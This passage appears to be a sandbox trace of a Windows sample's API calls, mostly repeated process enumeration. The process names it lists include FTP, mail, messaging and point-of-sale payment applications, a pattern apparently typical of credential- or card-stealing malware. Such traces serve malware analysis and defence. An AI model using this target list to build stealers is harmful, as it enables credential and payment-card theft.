th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0248.548] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0248.551] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0248.554] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0248.556] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0248.558] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0248.561] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0248.564] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0248.566] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0248.568] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0248.570] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0248.600] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0248.603] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0248.606] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0248.608] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0248.611] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0248.614] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0248.618] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0248.620] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0248.623] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0248.625] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0248.628] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0248.631] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0248.633] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0248.642] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0248.644] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0248.646] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0248.648] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0248.650] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0248.652] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0248.654] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0248.657] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0248.659] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0248.661] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0248.662] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0248.664] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0248.666] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0248.668] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.671] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0248.673] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.715] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.717] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0248.719] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.721] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0248.722] CloseHandle (hObject=0x2308) returned 1 [0248.723] Sleep (dwMilliseconds=0x64) [0248.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2330 [0248.930] Process32First (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.933] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.935] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.937] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.939] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.941] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.943] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.945] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.946] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.989] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.992] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.994] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.996] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.998] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.000] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.003] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.006] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.009] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.012] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.014] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.016] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0249.019] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.020] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0249.023] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.025] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0249.087] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0249.091] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0249.093] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0249.096] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0249.099] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0249.101] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.104] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.106] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0249.109] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.111] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.114] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.116] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.119] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.121] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0249.195] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0249.198] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 